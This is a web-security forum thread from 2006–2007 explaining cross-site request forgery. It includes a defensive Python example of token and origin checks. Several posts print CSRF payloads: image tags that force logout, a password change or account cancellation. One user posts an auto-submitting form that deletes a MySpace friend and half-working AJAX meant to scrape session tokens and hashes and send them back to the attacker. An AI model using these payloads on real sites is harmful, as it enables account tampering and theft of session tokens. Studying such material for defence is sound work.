Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
CSRF
Posted by: jeremy02
Date: December 24, 2006 01:15PM

Hey, all, I'm new here. I registered to ask questions since I no longer can at HTS because Nea hates me.


Anyways, what, exactly, is CSRF? Isn't it something like using images that aren't actually images to cause a person to perform an action accidentally? Something like what is below?


<img src="http://www.site.com/logout.php?logout=yes">

Re: CSRF
Posted by: WhiteAcid
Date: December 24, 2006 02:02PM

As for the Nea issue. I've found her to be a fair mod, but if you have an issue bring it up with nyko or myself and we'll look into it. If you could provide specific instances of where you think she's unfair then that'd help.

As for CSRF have a look at http://en.wikipedia.org/wiki/CSRF and http://blogs.securiteam.com/index.php/archives/192

It's not specific to images. It's creating a request to another site which causes something the user doesn't want. That logout link you posted is an example, but a pretty trivial one. Imagine doing <img src="http://www.example.com/user_act.php?action=change_password&pw=snowwhite" />. Or imagine <img src="http://www.example.com/user_act.php?action=cancel_account" />

As for the exact difference between this and XSS, the line is blurred. The terms need to be re-created.

Oh, and welcome :)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 3 time(s). Last edit at 12/24/2006 02:09PM by WhiteAcid.

Re: CSRF
Posted by: maluc
Date: December 24, 2006 02:11PM

Edit: WhiteAcid already answered it.

Here's another good whitepaper on it http://www.isecpartners.com/files/XSRF_Paper_0.pdf (although they call it XSRF, which hasn't really caught on)

And... I think the differences between CSRF and XSS are pretty clear cut, but they do often require each other to make a viable exploit.

-maluc



Edited 1 time(s). Last edit at 12/24/2006 02:22PM by maluc.

Re: CSRF
Posted by: jeremy02
Date: December 24, 2006 03:54PM

Very informative posts from both of you. Thanks.


As far as the Nea thing goes, she warned me once because I asked a question about a dedicated server in the off topic section instead of the "nzone" hardware section, and another time because in a thread about some kid committing suicide, I wrote that anyone that considers suicide deserves to die anyway. If I remember correctly, you commented back with a humorous, "I think they're banking on that", or something along those lines. However, she felt the need to warn me.


Those are really the only two I can think of offhand.

Re: CSRF
Posted by: WhiteAcid
Date: December 24, 2006 04:02PM

Maluc, I suppose they are defined, but often you'd use both, as you say. So, explaining just one doesn't quite work. I guess I wasn't thinking straight.

Jeremy, sent you a PM as not everyone cares about your warnings on another site.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: CSRF
Posted by: rsnake
Date: December 24, 2006 04:32PM

For shizzle. You are more than welcome to ask your questions here, but keep the banter about who hates who to PM. The last thing I want is this to degrade into a social forum.

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF
Posted by: kirke
Date: January 05, 2007 11:16AM

CSRF and XSS have nothing to do with each other.
Well, it may be that CSRF is simpler to do if you have an XSS somewhere, but they're not related in the functionality.
It's a common confusion that CSRF (aka XSRF) is compared with XSS. XSS is more a "static" data validation problem, while CSRF most likely is one of the application's logic.

Before CSRF became popular, the terms Web trojan and Client-Side Trojan were also used (I guess first by Sverre Huseby). IMHO these terms describe better what's going on.
I personally prefer Session riding in most cases, 'cause that describes that it is a session (logic) problem, not one of data validation, in particular if there is a session id in use, somehow (whether cookie or basic auth).

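A defender-side illustration of the point made in WhiteAcid's and kirke's posts above: the forged request rides on the victim's session cookie, so the fix is a session-bound check, not input validation. This is an added example, not code from the thread or from any site mentioned in it; the secret, the site origin and the request dicts are constructed for the demo.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed per-deployment secret and site origin (both assumed for the demo).
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"
SITE_ORIGIN = "https://www.example.com"

def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session by HMAC. It is embedded only in
    the site's own forms, so a page on another origin cannot know it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def request_is_trusted(req: dict) -> bool:
    """Decide whether a state-changing request may act on the victim's session.
    `req` is a plain dict (constructed here) with keys method, origin, cookies, params."""
    # 1. State changes never ride on GET: an <img src=...> can only issue a GET.
    if req["method"] != "POST":
        return False
    session_id = req["cookies"].get("sid")
    if not session_id:
        return False
    # 2. The submitted token must be the one bound to this session (constant-time compare).
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(expected, req["params"].get("csrf_token", "")):
        return False
    # 3. Defence in depth: the browser-set Origin header must be our own origin.
    origin = req.get("origin")
    if not origin:
        return False
    parts = urlsplit(origin)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN

def sample_requests() -> dict:
    """Three constructed requests, all carrying the victim's session cookie."""
    cookies = {"sid": "victim-session-123"}
    return {
        # Forged <img src="...logout.php?logout=yes"> from the thread: a bare GET.
        "forged_img": {"method": "GET", "origin": "https://evil.example", "cookies": cookies,
                       "params": {"logout": "yes"}},
        # Cross-site form auto-submitted from another origin; the token is unknown to it.
        "forged_post": {"method": "POST", "origin": "https://evil.example", "cookies": cookies,
                        "params": {"action": "change_password", "csrf_token": "guess"}},
        # Legitimate submission of the site's own form with the token issued for this session.
        "legit_post": {"method": "POST", "origin": SITE_ORIGIN, "cookies": cookies,
                       "params": {"action": "change_password",
                                  "csrf_token": issue_csrf_token("victim-session-123")}},
    }
```

Only the legitimate submission passes; the two forgeries fail because the browser attaches the cookie automatically but cannot supply a token it has never seen.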
Re: CSRF
Posted by: rsnake
Date: January 12, 2007 01:37PM

I don't know why but I've always thought that these naming issues were completely pedantic. XSS for instance is just about the worst named acronym I can think of, as it completely fails to describe the nature of the attack in many ways. I don't really care what the name is, as long as we all know what we are talking about, and in both the cases of CSRF/Session Riding (I'm open to using either) and XSS I think everyone understands what we are talking about.

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF
Posted by: eyeced
Date: January 16, 2007 05:48PM

I'm really interested in CSRF. Although this forum isn't as active as the XSS related ones, I'd be interested to read any CSRF exploits in sites that people have found, in sort of a "So it begins" thread for CSRF, as I'm sure many other people would. So if any CSRF 'exploits' are found in websites I hope people will share and discuss. I have a dream that one day CSRF will be discussed as much as XSS...

Well, maybe I'm not that passionate about it, but I like to know as much as I can about as many different areas of security, and as I'm relatively new to CSRF I'm quite hungry for real world uses and general examples...

Re: CSRF
Posted by: rsnake
Date: January 16, 2007 09:14PM

I built a real-world example during a penetration test, to prove that I could force a user to change their email address to whatever I want. That combined with other issues in the site gave me complete access to the user's account and worse.

I'm interested in CSRF, but it's a far less complex topic than XSS, which is why I think we tend to talk about it a little less. Do you have any particular questions to spark some conversations?

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF
Posted by: eyeced
Date: January 17, 2007 08:42AM

I'm not sure whether I agree or not with the complexity of the two being more for XSS. On a basic level, for example <img src=domain.com/password.php?newpass=omghaxed>, then yeah, I would agree XSS is far more complex than this, but CSRF requires a lot more thought on CAPTCHA evasion or randomly generated hashes etc. I think they both have simple levels to them, but thinking out of the box and taking it beyond the obvious methods is what defines the complexity of either method. Anyway yes, I do have a particular question as of 5 minutes ago. I was reading the 'Fun ideas for a myspace worm' thread and somebody mentioned deleting Tom from their friends list. I don't mean to pick on MySpace, but it's a very large site with fairly good security in mind, so I chose this. Anyway, I made some code to automatically delete Tom from the user's profile upon viewing; the trouble is some variables that need to be used. I wouldn't say I'm the most clued up person in AJAX, although I have had a browse. Anyway, my code was

<form name="PageForm" action="index.cfm" method="get">
<input type="Hidden" name="fuseaction" value="user.editfriends">
<input type="hidden" name="friendID" value="YOURIDHERE">
<input type="hidden" name="page" value="">
<input type=hidden name=Mytoken value=YOURTOKENHERE>
</form>

<form action="http://collect.myspace.com/index.cfm?fuseaction=user.deleteFriend&page=0" method="post" name="friendsDelete" id="friendsDelete">
<input type="hidden" name="hash" value="YOURHASHHERE">
<input type=hidden name=Mytoken value=YOURTOKEN>
<input type="checkbox" name="delFriendID" value="6221" checked>
</form>
<script>
document.friendsDelete.submit()
</script>
</body></html>

As you can see there are only 3 different variables that affect the ability of this page to automatically delete a friend from the user's list: Mytoken, HASH, and your friend ID. I was thinking of using AJAX for this; could anyone give me pointers, or possible code examples for implementing this.

I was thinking of testing this with

<script>
var friendid=encodeURIComponent(findContents(oXML,'friendid=','&MyToken=',9));
</script>

or

<script>
var start = html.indexOf('friendID') + 17;
var end = html.indexOf('"',start);
var id = html.slice(start,end);
</script> --from a maluc example

Then calling the friendid as an alert to test it, but it didn't work...

This is killing me...please help.



Edited 1 time(s). Last edit at 01/17/2007 09:25AM by eyeced.

Re: CSRF
Posted by: eyeced
Date: January 17, 2007 04:11PM

I know I've double posted, but I didn't want to confuse people by adding more to what I've already put, and to let them know that I have come back to this after more thought.
For actual use of this, being able to delete Tom automatically, where would the code go? I mean it'd have to be placed on the page where the hash, token, and friendID of the victim are all present...

Anyway, if anyone still has an answer to the AJAX issues I am facing, please let me know, just out of curiosity.

Okay, another idea was to use the AJAX to send the different variables to a PHP script on my server which would then log them nicely into a text file, but when I tried this I sniffed the connection to see if anything was happening and I got a request for crossdomain.xml, so I'm guessing there are policies on this sort of thing happening. So then I thought I could just PM the variables to myself on MySpace, but by this point I'm way out of my depth, throwing sloppy code together just trying to put my ideas across. To which I came up with this...

var doEdit=function(oXML){

var friendid=encodeURIComponent(findContents(oXML,'friendid=','&MyToken=',9));

if(friendid){
var thehash = encodeURIComponent(findContents(oXML,'editInterests_hash','\" />', 27));
if('%22%20maxleng' == headlinetext) {
headlinetext = '';

}

}
};

var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
XMLHttpRequestObject = new XMLHttpRequest();
}
else (window.ActiveXObject)
{
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}

function socket()
{
string?
XMLHttpRequestObject.open('GET', 'http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID=+friendid+&MyToken=+token&message=+thehash', true);
XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XMLHttpRequestObject.send(null);
delete XMLHttpRequestObject;
}
window.document.onload='socket();'

Take note the messaging URL for MySpace is just an example (obviously); what I'm trying to show is a way of bypassing the crossdomain policy to be able to PM yourself or post on your blog or anything information about the user that has visited your profile, such as the hash, friendID and tokens etc... This is all going quite mad at the moment; I appreciate there is a lot to read... so I await your feedback, people.



Edited 1 time(s). Last edit at 01/17/2007 06:46PM by eyeced.

Re: CSRF
Posted by: rsnake
Date: January 17, 2007 06:45PM

Hmmm... I'm not sure I'd agree with your disagreement. :) CAPTCHAs and randomly generated hashes can affect XSS as well. Those I think are very separate issues and should be considered separate so as not to confuse the actual issue. CAPTCHAs and tokens can be put anywhere, including the front page of the website, preventing anything, including SQL attacks, PHP includes, the works. Very different.

Anyway...

I wish I could help with the MySpace thing, but I've long since deleted my MySpace account after some blonde real estate agent started stalking me using it. Creepy.

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF
Posted by: eyeced
Date: January 17, 2007 06:48PM

Okay, so now I have 2 massive posts on my possible AJAX attacks; I'll just leave the more AJAX-knowledgeable members to pull it apart and give me advice... or at least I hope.

Thanks in advance.
